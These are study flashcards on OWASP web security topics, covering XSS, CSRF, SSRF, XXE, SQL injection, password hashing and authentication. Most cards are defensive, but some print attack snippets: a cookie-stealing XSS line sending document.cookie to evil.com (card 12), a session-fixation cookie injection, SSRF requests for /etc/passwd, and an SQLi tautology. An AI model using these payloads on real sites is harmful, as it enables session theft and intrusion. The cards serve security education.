OWASP part 2 Flashcards

1
Q

Exam question:
Which security guiding principle is related to the blacklisting countermeasure?

A

Be reluctant to trust

2
Q

Exam question:
Which security guiding principles are related to the encrypt sensitive information countermeasure?

A

Remember that hiding secrets is hard

3
Q

What is the security issue of cookie-based tokens?

A

The server can only see the cookie name and value, not from which domain it was sent.

Only sees:
Cookie: NAME=VALUE

4
Q

Fill in the blank: All input is ___

A

Evil

5
Q

Which vulnerability is related to session fixation attack?

A

When servers escalate anonymous session tokens without changing their value.

6
Q

What can an attacker achieve with SQLi?

A

Modification/destruction of data

Unauthorized access to data, steal information

Privilege escalation

Expose database structure

DoS

7
Q

What are possible countermeasures against SQLi?

A

Prepared statements, bind variables
Mitigating impact

Not recommended to only do:
- escape
- blacklist
- whitelist

8
Q

What does it mean to bind variables when mitigating SQLi?

A

To put one or more placeholders in the text of the SQL statement, then specify the variable (value to be used) for each placeholder.

9
Q

What are the 8 most common OWASP risks at this point in time?

A

More injection attacks - XSS

Broken access control - CSRF

SSRF

Security misconfiguration - XML external entities

SW and data integrity failures - insecure deserialization

Identification and auth failure - Broken authentication

Security logging and monitoring failures - insufficient logging and monitoring

HTML security issues - Clickjacking

10
Q

What type of session management attacks can be achieved using XSS?

A

Session token theft

Session fixation

11
Q

What is XSS?

A

Can occur when JS code is sent as user input and the server does not sanitize the input but echoes it directly into the HTML page. This way, the user input will be interpreted as code and executed.

12
Q

How can XSS be used to steal tokens? (Token theft)

A

An attacker finds out that http://example.com/query? is vulnerable to XSS.

The attacker knows that user A uses this page a lot.

The attacker sends the following link to the user:
http://example.com/query?name=

new Image().src = "http://evil.com/log?c=" + document.cookie;

The attacker lures the user to click this link.

When the user clicks the link, the script is echoed back to the user's browser and executed. The user's anonymous or logged-in cookie at example.com is logged at evil.com.

13
Q

How can XSS be used in session fixation attacks?

A

The attacker sends a request to example.com and receives back an anonymous token from the server.

At the same time, A visits the same site and receives their own anonymous cookie.

Then, the attacker sends the link to A:
http://example.com/query?name=

document.cookie = "exampleSiteToken=attackersToken"

The attacker lures A to click this link.

Later, A logs in to the example.com site. If the credentials are valid, the server escalates the anonymous token, which now carries the attacker's value, to a logged-in token.

The attacker can now use their token to impersonate A.

14
Q

What are some usual sources of untrusted input?

A

Query

User/profile page

Forum/Message board

Blogs

15
Q

What are the 2 types of XSS attacks?

A

Reflected XSS

Stored XSS

16
Q

What is reflected XSS?

A

JS is injected into a request

The JS code is reflected immediately in the response

17
Q

What is stored XSS?

A

Script injected into a request, then stored somewhere on the server.
Reflected repeatedly, making it more easily spread.

18
Q

How can XSS be mitigated?

A

Sanitize input data
Sanitize or escape data that is inserted into a web page.

Don’t rely on sanitizing only on the client side, as requests can be intercepted. Always sanitize on the server side as well.

19
Q

What is the flow of CSRF?

A

User logs in and gets a session ID from the server:
Cookie: sessionID=1234

The user still has this session open when visiting a new site: evil.com

This site contains an image that is not a real image, but rather refers to a transfer site of the bank:
<img></img>

When the browser loads the image, the link is requested, effectively sending a request on behalf of the user. The session ID of the user is used to complete the transaction.

The attacker needs to understand how transaction requests are made from the banking app, to be able to forge a correct request.

20
Q

What is the vulnerability that makes CSRFs possible?

A

Session management that relies only on a cookie, so the server is not able to distinguish between real and forged requests.

21
Q

How can you identify if a website is vulnerable to CSRF?

A

Identify a URL to test for CSRF. For example, test if you are able to delete an account on a website using CSRF.

Set up a different website that contains:
<img src="http://example.com/account/del">

Create a dummy account on the original website, and log in.

With the session active, open the HTML page we just created in the same browser.

If the account was deleted -> the site is vulnerable

22
Q

How can CSRF be mitigated? (4)

A

Extra authentication when doing transactions: re-authenticate

CSRF tokens (action tokens)

SameSite cookies (browser setting): Prevents cross-site cookie usage

Referer-based validation: Verifies that the request originates from own domain.

23
Q

How can we mitigate CSRF using CSRF tokens?

A

Combine tokens in the cookie and the hidden-form field. Add action token as hidden field to genuine forms. This token should not be predictable.

When a user logs in, they get a session ID. When the user asks for the transfer form, a CSRF token is created and put in a hidden field. The form is then returned to the user.

Whenever a user issues a request from the form, both the cookie and the CSRF token are sent. The server checks both.

23
Q

What is SSRF?

A

A browser is talking to a web app that is in a trust zone with other servers or services. The server can access backend services.

The attacker sends a request to the server, which is then forwarded within the trusted zone. This request executes with the rights of the web server.

24
Q

Give 2 examples of SSRF requests

A

GET /?url=http://127.0.0.1/admin/
GET /?url=file:///etc/passwd

25
Q

How can SSRF be countermeasured?

A

There is no universal fix, as it depends on the server-side implementation (application functionality and business requirements). Some approaches:
- Whitelisting on the server side (which IP addresses can pass through)
- Handle responses from the server: e.g. make sure not to send files or passwords
- Authentication between the server and internal services
- Network segregation

26
Q

What is XML External Entities in regards to security misconfigurations?

A

Relevant when we have code that requires an XML parser.
!ENTITY: External entity declaration, name of the external entity
SYSTEM: Private/local
URI: Location of the variable

External entities refer to things that are used often in multiple documents in different parts of the code. Used so that the same information does not need to be fetched multiple times from the different places.

27
Q

Describe XML External Entities (XXE) attacks

A

An attack where an attacker uses malicious XML input that references an external entity that is processed by a weakly configured XML parser.

Normal input:
Input: Hello
Output after XML parsing: Hello

Malicious:
Input: ]>&xxefile
Output: Content of passwd file

28
Q

How can XXE be countermeasured?

A

Disable processing/parsing of XML external entities and DTDs (Document Type Definitions).
Use safe parsing libraries, or defused parsing.

29
Q

Describe insecure deserialization in regards to software and data integrity failures

A

An attacker can tamper with network data and inject a malicious payload into a serialized data stream, e.g. an SQLi payload.

Data stream:
{"ID": "user1' or 1=1", "Course": "4237", "Grade": "C"}

Server-side code:
SELECT Grade FROM student WHERE user='user1' or 1=1

30
Q

How can insecure deserialization be countermeasured?

A

Don't accept serialized objects from untrusted sources.
Integrity checks: e.g. digital signatures on serialized objects.
Isolate and run code that deserializes in low-privilege environments.
Use JSON: a data-only serialization format.

31
Q

What is the difference between identification and authentication?

A

Identification: An entity telling who they are
Authentication: An entity proving/verifying that they are the identity they claim to be

32
Q

How can authentication be done?

A

3 ways:
- Something you know
- Something you have
- Something you are

33
Q

How can "Something you know" be implemented, and what are the advantages/disadvantages?

A

Password, security questions
Pros:
- Simple to implement, understand and use
Cons:
- Easy to crack, and easy to forget

34
Q

How can "Something you have" be implemented, and what are the advantages/disadvantages?

A

BankID, mobile phone (one-time password)
Pros:
- Hard to crack, as long as it is not lost
Cons:
- The thing can be broken, stolen or forged
- If you lose the phone, you won't be able to get a one-time password for a while
- Strength of auth depends on the difficulty of forging

35
Q

How can "Something you are" be implemented, and what are the advantages/disadvantages?

A

Biometrics: fingerprint, palm scan, facial recognition, usage patterns, signature dynamics
Pros:
- Hard to crack
- Hard to steal (?): We leave our biometrics everywhere: fingerprints are not so hard to steal anymore, recorded voices/faces can be used to forge voice or facial recognition
Cons:
- Accuracy: false negatives/false positives
- Social acceptance and privacy issues
- Key management
- Hard to replace

36
Q

How can passwords be cracked?

A

Vulnerable password storage: Passwords are often stored in files with the following format. If an attacker gets the file, all users are compromised.
username:password

37
Q

What is a countermeasure against password cracking?

A

Hashing: Store a hashed version of the password, not the plaintext version.
In storage:
username:923786t8732kdsbhy77832bwd11k

38
Q

Why shouldn't the client hash the password?

A

If someone gets access to the hash database, they can use the hash to enter the database from the client. The server would not be able to distinguish between the hash and the entries in the database. Never trust the client. So use other security measures to protect the password in transit, rather than hashing.

39
Q

How can hashed passwords be attacked?

A

Dictionary attacks:
- Precompute the hash of a long list of common passwords (people tend to use the same passwords)
- Compare what is in the password file to these
- This can be done really quickly offline once a password file is obtained; the comparison can be run on a very fast computer

40
Q

What is a good defence against dictionary attacks?

A

Concatenate the password with a random salt: password || 1212
Hash this
Store the hash with the salt:
username:bufeiwoiu23390234r67823:1212

41
Q

When is salting not a good defence against dictionary attacks?

A

Against offline attacks, when the attacker gets access to the password file where both the hashed password and the salt are stored. The salt is stored in plaintext in the password file, so the attacker can just use the salt they have found and run the same attacks.

42
Q

When is salting a good defence against dictionary attacks?

A

Against online attacks, where an attacker does not have access to the record containing the salt (file or db record).

43
Q

Why do we store the salt in plaintext, and not a hashed version?

A

You need the original salt to compare the password with the stored hashed version of the password.

44
Q

What is a rainbow table?

A

The precomputed hash tables of common passwords

45
Q

Why are dictionary attacks not as efficient when using a salt?

A

A rainbow table needs to be computed for every salt.

46
Q

How can we make hashed passwords even more secure?

A

Using a pepper. A pepper is a secret value that is appended to the password before it is hashed. Unlike salts, the pepper is the same for every user and is not saved in the password file. The pepper is stored in an encrypted form in another secure place.
hash(password || pepper || salt)

47
Q

What are the benefits of using peppers in password storage?

A

Makes the password longer and more complex.
Defends against offline attacks better:
- The pepper is stored encrypted in another location
- If the attacker steals the password file, the pepper is still unknown

48
Q

Why is additional password security still required, besides salt and pepper?

A

Dictionary attacks are still possible; they just require more computing power.

49
Q

What are some additional password security techniques?

A

Combine password security with other authentication countermeasures such as:
- Filtering
- Limiting the number of logins
- Aging passwords
- 2FA or multichannel auth
- Last login/protective monitoring
- One-time passwords

50
Q

What is password filtering?

A

When creating a password, it must meet some minimum requirements: length, mix of characters, case.
Measure the strength: weak, medium, strong

51
Q

What is limiting the number of logins?

A

Lock out the user after a certain number of login attempts.
This is inconvenient for forgetful users.

52
Q

What attack can be done on a system that limits the number of logins?

A

DoS: Lock out legitimate users by attempting to log in as them until they are locked out.

53
Q

What is login throttling?

A

Each time a login fails, the user must wait a longer time to try again.
Inconvenient, but prevents users from being locked out.

54
Q

What is last login/protective monitoring?

A

Notify users of suspicious logins (login date, time, location).
Educate users to pay attention.
Educate users to report possible attacks.

55
Q

What are aging passwords?

A

A policy that requires users to change passwords every now and then.
Cons:
- People tend to forget passwords more often
- Users find workarounds: repeating passwords, incrementing, easy-to-guess adjustments

56
Q

What are one-time passwords?

A

Login with a different password each time, through SMS or a device (e.g. BankID).
Works as long as the user has access to the device.

57
Q

What is 2FA, two-channel?

A

Combines 2 or more ways of authentication.
Often: password + one-time password, password + BankID

58
Q

What is a common password attack vector?

A

Going through the forgot-password functionality. As a developer, you need to think about how this process can be made safe.

59
Q

What are some common ways of doing password recovery?

A

- URL tokens: an expiration date is important
- PINs
- Offline methods: e.g. show up at the office to confirm the password
- Security questions (not a good idea, as a lot of this information is available to the public)

60
Q

What are the tradeoffs in authentication?

A

Authentication security vs. usability

61
Q

What is CAPTCHA and reCAPTCHA?

A

Completely Automated Public Turing test to tell Computers and Humans Apart.
Used to block bots. Machines are not good at solving captchas, but are getting better with machine learning.

62
Q

Name 6 authentication and password test cases

A

- Testing for vulnerable remember-password functionality
- Testing for browser cache weakness
- Testing for weak password policy
- Testing for weak security question/answer
- Testing for weak password change or reset functionality
- Testing for weaker auth in an alternative channel

63
Q

What is insufficient logging and monitoring, in regards to security logging and monitoring?

A

Typical vulnerabilities:
- Logins, failed logins and high-value transactions are not logged at all
- Warnings and errors generate no, inadequate or unclear log messages
- Logs are not monitored properly
- Logs are only stored locally. This makes it easier for an attacker to wipe the logs, and makes it difficult to monitor the logs properly.
- Appropriate alerting thresholds and response escalation processes are not in place or effective. Need to have a real-time response.

Systems are weak if they are unable to detect, escalate, or alert for active threats in real time or near real time.

64
Q

What is clickjacking in regards to HTML security issues?

A

When someone puts an invisible website on top of a website with legit content, as an iframe. The user might think they are clicking on a button, when they actually are clicking on the iframe.
Uses an iframe and opacity:
Top layer: What the attacker wants you to click on, opacity 0
Bottom layer: What the user sees, opacity 1

65
Q

What are some countermeasures against clickjacking?

A

"X-Frame-Options: deny"
Use this in the response header of the legit site; this completely disables the loading of the page in a frame.